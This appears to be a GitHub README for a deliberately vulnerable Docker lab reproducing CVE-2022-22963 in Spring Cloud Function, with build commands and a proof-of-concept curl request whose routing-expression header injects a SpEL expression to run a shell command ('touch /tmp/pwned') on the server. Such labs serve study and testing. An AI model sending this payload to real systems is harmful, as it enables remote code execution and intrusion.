me2nuk / CVE-2022-22963

Spring Cloud Function Vulnerable Application / CVE-2022-22963

Spring Cloud Function Vulnerability(CVE-2022-22963)

Vulnerable Application to CVE-2022-22963

CVE-2022-22963 Exploit Demo

CVE-2022-22963.mp4

Build

docker pull me2nuk/cves:2022-22963
docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963

POC

curl -X POST  http://0.0.0.0:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/pwned")' --data-raw 'data' -v
docker exec -it --user=root vuln ls /tmp

Reference

About

Spring Cloud Function Vulnerable Application / CVE-2022-22963

Languages

Language:Dockerfile 100.0%